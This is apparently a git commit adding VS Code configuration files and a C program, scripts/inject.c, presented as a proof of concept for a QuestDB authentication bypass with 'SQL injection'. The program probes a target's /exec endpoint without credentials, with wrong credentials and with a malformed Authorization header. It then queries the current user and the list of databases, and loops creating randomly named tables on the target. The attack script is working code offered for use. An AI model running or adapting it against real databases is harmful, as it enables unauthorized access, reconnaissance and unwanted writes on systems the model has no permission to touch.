feat: 添加QuestDB认证绕过POC和SQL注入脚本

添加用于演示QuestDB认证绕过漏洞的概念验证脚本，包括以下功能：
- 测试无凭证访问
- 测试错误凭证和畸形Authorization头
- 执行系统信息查询
- 自动生成随机表进行注入测试
- 添加VS Code调试配置文件

Author: ctkqiang

.vscode/c_cpp_properties.json

@@ -0,0 +1,18 @@
+{
+  "configurations": [
+    {
+      "name": "macos-clang-arm64",
+      "includePath": [
+        "${workspaceFolder}/**"
+      ],
+      "compilerPath": "/usr/bin/clang",
+      "cStandard": "${default}",
+      "cppStandard": "c++20",
+      "intelliSenseMode": "macos-clang-arm64",
+      "compilerArgs": [
+        ""
+      ]
+    }
+  ],
+  "version": 4
+}

.vscode/launch.json

@@ -0,0 +1,13 @@
+{
+  "version": "0.2.0",
+  "configurations": [
+    {
+      "name": "C/C++ Runner: Debug Session",
+      "type": "lldb",
+      "request": "launch",
+      "args": [],
+      "cwd": "/Users/johnmelodyme/Documents/ctkqiang/QuestExploit/scripts",
+      "program": "/Users/johnmelodyme/Documents/ctkqiang/QuestExploit/scripts/build/Debug/outDebug"
+    }
+  ]
+}

.vscode/settings.json

@@ -0,0 +1,59 @@
+{
+  "C_Cpp_Runner.cCompilerPath": "clang",
+  "C_Cpp_Runner.cppCompilerPath": "clang++",
+  "C_Cpp_Runner.debuggerPath": "lldb",
+  "C_Cpp_Runner.cStandard": "",
+  "C_Cpp_Runner.cppStandard": "c++20",
+  "C_Cpp_Runner.msvcBatchPath": "",
+  "C_Cpp_Runner.useMsvc": false,
+  "C_Cpp_Runner.warnings": [
+    "-Wall",
+    "-Wextra",
+    "-Wpedantic",
+    "-Wshadow",
+    "-Wformat=2",
+    "-Wcast-align",
+    "-Wconversion",
+    "-Wsign-conversion",
+    "-Wnull-dereference"
+  ],
+  "C_Cpp_Runner.msvcWarnings": [
+    "/W4",
+    "/permissive-",
+    "/w14242",
+    "/w14287",
+    "/w14296",
+    "/w14311",
+    "/w14826",
+    "/w44062",
+    "/w44242",
+    "/w14905",
+    "/w14906",
+    "/w14263",
+    "/w44265",
+    "/w14928"
+  ],
+  "C_Cpp_Runner.enableWarnings": true,
+  "C_Cpp_Runner.warningsAsError": false,
+  "C_Cpp_Runner.compilerArgs": [],
+  "C_Cpp_Runner.linkerArgs": [],
+  "C_Cpp_Runner.includePaths": [],
+  "C_Cpp_Runner.includeSearch": [
+    "*",
+    "**/*"
+  ],
+  "C_Cpp_Runner.excludeSearch": [
+    "**/build",
+    "**/build/**",
+    "**/.*",
+    "**/.*/**",
+    "**/.vscode",
+    "**/.vscode/**"
+  ],
+  "C_Cpp_Runner.useAddressSanitizer": false,
+  "C_Cpp_Runner.useUndefinedSanitizer": false,
+  "C_Cpp_Runner.useLeakSanitizer": false,
+  "C_Cpp_Runner.showCompilationTime": false,
+  "C_Cpp_Runner.useLinkTimeOptimization": false,
+  "C_Cpp_Runner.msvcSecureNoWarnings": false
+}

scripts/inject.c

@@ -0,0 +1,257 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <time.h>
+#include <getopt.h>
+#include <curl/curl.h>
+
+#define DEFAULT_PORT 9000
+#define MAX_URL_LEN 512
+#define MAX_QUERY_LEN 1024
+#define RAND_CHARS "abcdefghijklmnopqrstuvwxyz"
+
+struct MemoryStruct {
+    char *memory_buffer;
+    size_t memory_size;
+};
+
+static size_t WriteMemoryCallback(void *content_data, size_t element_size, size_t element_count, void *user_data) {
+    size_t total_size = element_size * element_count;
+    struct MemoryStruct *memory_struct = (struct MemoryStruct *)user_data;
+
+    char *reallocated_memory = realloc(memory_struct->memory_buffer, memory_struct->memory_size + total_size + 1);
+    if (!reallocated_memory) {
+        fprintf(stderr, "内存不足\n");
+        return 0;
+    }
+
+    memory_struct->memory_buffer = reallocated_memory;
+    memcpy(&(memory_struct->memory_buffer[memory_struct->memory_size]), content_data, total_size);
+    memory_struct->memory_size += total_size;
+    memory_struct->memory_buffer[memory_struct->memory_size] = 0;
+
+    return total_size;
+}
+
+char *http_get_request(const char *request_url, const char *user_credentials, const char *custom_header) {
+    CURL *curl_handle;
+    CURLcode curl_result;
+    struct MemoryStruct response_chunk;
+    response_chunk.memory_buffer = malloc(1);
+    response_chunk.memory_size = 0;
+
+    curl_global_init(CURL_GLOBAL_ALL);
+    curl_handle = curl_easy_init();
+    if (!curl_handle) {
+        fprintf(stderr, "curl 初始化失败\n");
+        free(response_chunk.memory_buffer);
+        return NULL;
+    }
+
+    curl_easy_setopt(curl_handle, CURLOPT_URL, request_url);
+    curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
+    curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&response_chunk);
+    curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, 10L);
+
+    if (user_credentials) {
+        curl_easy_setopt(curl_handle, CURLOPT_USERPWD, user_credentials);
+    }
+
+    if (custom_header) {
+        struct curl_slist *http_headers = NULL;
+        http_headers = curl_slist_append(http_headers, custom_header);
+        curl_easy_setopt(curl_handle, CURLOPT_HTTPHEADER, http_headers);
+    }
+
+    curl_result = curl_easy_perform(curl_handle);
+    if (curl_result != CURLE_OK) {
+        fprintf(stderr, "curl 请求失败: %s\n", curl_easy_strerror(curl_result));
+        free(response_chunk.memory_buffer);
+        response_chunk.memory_buffer = NULL;
+    }
+
+    curl_easy_cleanup(curl_handle);
+    curl_global_cleanup();
+    return response_chunk.memory_buffer;
+}
+
+void generate_random_string(char *buffer, size_t length) {
+    static const char charset[] = RAND_CHARS;
+    for (size_t i = 0; i < length; i++) {
+        int random_index = rand() % (int)(sizeof(charset) - 1);
+        buffer[i] = charset[random_index];
+    }
+    buffer[length] = '\0';
+}
+
+void inject_test_tables(const char *target_host, int loop_count) {
+    char base_exec_url[MAX_URL_LEN];
+    if (strncmp(target_host, "http://", 7) == 0 || strncmp(target_host, "https://", 8) == 0) {
+        snprintf(base_exec_url, sizeof(base_exec_url), "%s/exec", target_host);
+    } else {
+        snprintf(base_exec_url, sizeof(base_exec_url), "http://%s:%d/exec", target_host, DEFAULT_PORT);
+    }
+
+    srand(time(NULL));
+    for (int iteration = 0; iteration < loop_count; iteration++) {
+        int table_name_length = 5 + rand() % 6;
+        char table_name[16];
+        generate_random_string(table_name, table_name_length);
+
+        int column_count = 2 + rand() % 9;
+        char create_table_query[MAX_QUERY_LEN] = "CREATE TABLE ";
+        strcat(create_table_query, table_name);
+        strcat(create_table_query, " (");
+
+        for (int column_index = 0; column_index < column_count; column_index++) {
+            char column_name[8];
+            generate_random_string(column_name, 5);
+            strcat(create_table_query, column_name);
+            strcat(create_table_query, " INT");
+            if (column_index < column_count - 1) strcat(create_table_query, ", ");
+        }
+        strcat(create_table_query, ");");
+
+        CURL *curl_handle = curl_easy_init();
+        if (!curl_handle) {
+            fprintf(stderr, "curl 初始化失败\n");
+            return;
+        }
+        char *url_encoded_query = curl_easy_escape(curl_handle, create_table_query, 0);
+        if (!url_encoded_query) {
+            fprintf(stderr, "URL 编码失败\n");
+            curl_easy_cleanup(curl_handle);
+            return;
+        }
+
+        char full_request_url[MAX_URL_LEN + MAX_QUERY_LEN + 16];
+        snprintf(full_request_url, sizeof(full_request_url), "%s?query=%s", base_exec_url, url_encoded_query);
+        curl_free(url_encoded_query);
+        curl_easy_cleanup(curl_handle);
+
+        char *http_response = http_get_request(full_request_url, NULL, NULL);
+        if (http_response) {
+            printf("[%s] 正在注入表: %s | 响应长度: %zu\n", __TIME__, table_name, strlen(http_response));
+            free(http_response);
+        } else {
+            printf("[%s] 正在注入表: %s | 请求失败\n", __TIME__, table_name);
+        }
+        usleep(100000);
+    }
+}
+
+int main(int argc, char *argv[]) {
+    char *target_host = NULL;
+    int loop_count = 1;
+    int command_option;
+
+    while ((command_option = getopt(argc, argv, "u:l:")) != -1) {
+        switch (command_option) {
+        case 'u':
+            target_host = optarg;
+            break;
+        case 'l':
+            loop_count = atoi(optarg);
+            if (loop_count <= 0) loop_count = 1;
+            break;
+        default:
+            fprintf(stderr, "用法: %s -u <主机地址> [-l <循环次数>]\n", argv[0]);
+            return 1;
+        }
+    }
+
+    if (!target_host) {
+        fprintf(stderr, "错误: 必须指定 -u 参数\n");
+        return 1;
+    }
+
+    char base_exec_url[MAX_URL_LEN];
+    if (strncmp(target_host, "http://", 7) == 0 || strncmp(target_host, "https://", 8) == 0) {
+        snprintf(base_exec_url, sizeof(base_exec_url), "%s/exec", target_host);
+    } else {
+        snprintf(base_exec_url, sizeof(base_exec_url), "http://%s:%d/exec", target_host, DEFAULT_PORT);
+    }
+
+    printf("[*] QuestDB Authentication Bypass POC + SQL Injection\n");
+    printf("[*] 目标: %s\n", target_host);
+    printf("\n");
+
+    printf("[1] 测试无凭证访问...\n");
+    char *no_credential_response = http_get_request(base_exec_url, NULL, NULL);
+    if (no_credential_response) {
+        printf("%s\n", no_credential_response);
+        free(no_credential_response);
+    } else {
+        printf("请求失败\n");
+    }
+    printf("\n");
+
+    printf("[2] 测试错误凭证 (wrong:wrong)...\n");
+    char *wrong_credential_response = http_get_request(base_exec_url, "wrong:wrong", NULL);
+    if (wrong_credential_response) {
+        printf("%s\n", wrong_credential_response);
+        free(wrong_credential_response);
+    } else {
+        printf("请求失败\n");
+    }
+    printf("\n");
+
+    printf("[3] 测试畸形 Authorization 头...\n");
+    char *malformed_header_response = http_get_request(base_exec_url, NULL, "Authorization: Basic invalid");
+    if (malformed_header_response) {
+        printf("%s\n", malformed_header_response);
+        free(malformed_header_response);
+    } else {
+        printf("请求失败\n");
+    }
+    printf("\n");
+
+    printf("[4] 尝试读取系统信息...\n");
+    CURL *curl_handle = curl_easy_init();
+    if (curl_handle) {
+        char *system_info_query = curl_easy_escape(curl_handle, "select current_database(),current_user()", 0);
+        if (system_info_query) {
+            char system_info_url[MAX_URL_LEN + 128];
+            snprintf(system_info_url, sizeof(system_info_url), "%s?query=%s", base_exec_url, system_info_query);
+            curl_free(system_info_query);
+            char *system_info_response = http_get_request(system_info_url, NULL, NULL);
+            if (system_info_response) {
+                printf("%s\n", system_info_response);
+                free(system_info_response);
+            } else {
+                printf("请求失败\n");
+            }
+        }
+        curl_easy_cleanup(curl_handle);
+    }
+    printf("\n");
+
+    printf("[5] 获取数据库列表...\n");
+    curl_handle = curl_easy_init();
+    if (curl_handle) {
+        char *databases_query = curl_easy_escape(curl_handle, "show databases", 0);
+        if (databases_query) {
+            char databases_url[MAX_URL_LEN + 128];
+            snprintf(databases_url, sizeof(databases_url), "%s?query=%s", base_exec_url, databases_query);
+            curl_free(databases_query);
+            char *databases_response = http_get_request(databases_url, NULL, NULL);
+            if (databases_response) {
+                printf("%s\n", databases_response);
+                free(databases_response);
+            } else {
+                printf("请求失败\n");
+            }
+        }
+        curl_easy_cleanup(curl_handle);
+    }
+    printf("\n");
+    printf("[*] POC 完成 - 如果看到查询结果，说明漏洞存在\n");
+    printf("\n");
+
+    printf("正在对 %s 开始注入，共执行 %d 次...\n", target_host, loop_count);
+    inject_test_tables(target_host, loop_count);
+    printf("任务完成。\n");
+
+    return 0;
+}